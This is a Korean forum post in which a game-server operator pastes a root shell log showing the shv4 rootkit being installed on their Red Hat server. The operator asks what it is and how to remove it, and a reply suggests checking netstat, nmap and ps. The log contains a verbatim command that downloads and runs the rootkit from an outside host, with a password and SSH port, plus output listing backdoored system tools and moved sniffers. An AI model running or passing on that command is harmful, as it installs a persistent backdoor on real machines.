뭔지 모르겠어요. 백도어 깔린것 같은데..
[root@server root]# reset
[root@server root]# id
[root@server root]# wget http://aquanet.co.il/vip/shauli/shv4.tar.gz;tar -xzf shv4.tar.gz;cd shv4;./setup shauli 7823
--09:40:56-- http://aquanet.co.il/vip/shauli/shv4.tar.gz
=> `shv4.tar.gz.4'
Resolving aquanet.co.il... done.
Connecting to aquanet.co.il[]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 464,160 [application/x-gzip]
100%[========================================================================================>] 464,160 3.30M/s ETA 00:00
09:40:57 (3.30 MB/s) - `shv4.tar.gz.4' saved [464160/464160]
[sh]# Sit y00r ass d0wn whil3 w3 install shv4...
/sbin/ldconfig: File /lib/libext-2.so.7 is too small, not checked.
[sh]# NO PATCHING THIS VERSION ... do it manually Bitch
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/\ \:::\ \/__/ H /::::::\/::\__\
S /::\ \:::\__\ A \::/\::::::/ /
H \:::\/:::/ / C \/__\::::/ /
K \::::::/ / K /:::/ /
U \::::/ / ___ E /:::/ / ___
P \::/ / /\__\ R \::/ / /\__\
I \/__/ \/__/ S \/__/ \/__/
[sh] Internal Release v4 by PinTuRici
[sh]# backdooring started on server
[sh]# checking for remote logging... [sh]# guess not.
[sh]# [Installing trojans....]
[sh]# Using Password : shauli
[sh]# Using ssh-port : 7823
./setup: /etc/rc.d/rc.sysinit: Permission denied
./setup: /etc/rc.d/rc.sysinit: Permission denied
[sh]# : ps/du/ls/top/netstat/find backdoored
[sh]# [Moving our files...]
[sh]# : sniff/parse/sauber moved
[sh]# [Modifying system settings to suite our needs]
[sh]# [System Information...]
[sh]# Hostname : server (2**.1**.1**.1**)
[sh]# Arch : i686 -+- bogomips : 2660.76 '
[sh]# Alternative IP : -+- Might be [ 1 ] active adapters.
[sh]# Distribution: Red Hat Linux release 7.3 (Valhalla)
[sh]# ipchains ...?
ipchains: Incompatible with this kernel
[sh]# ============================== Backdooring completed in :-59 seconds
[root@server shv4]#
으으... 제가 운영하는 카스 서버인데 이런게 깔려버린?? ㅜ.ㅜ
뭔가 깔린것 같은데 이것 없애는 방법이나 정체가 뭔지 알려주세요.
깔려다 실패한것 같은 흔적이 보이는데, netstat -lpn 이나 다른 컴퓨터에서 nmap 스캐닝을 해보고 ps 도 체크해서 이상한 프로그램이 떠 있다면 척살하면 되는것 같습니다 '';
from bzImage
It's blue paper
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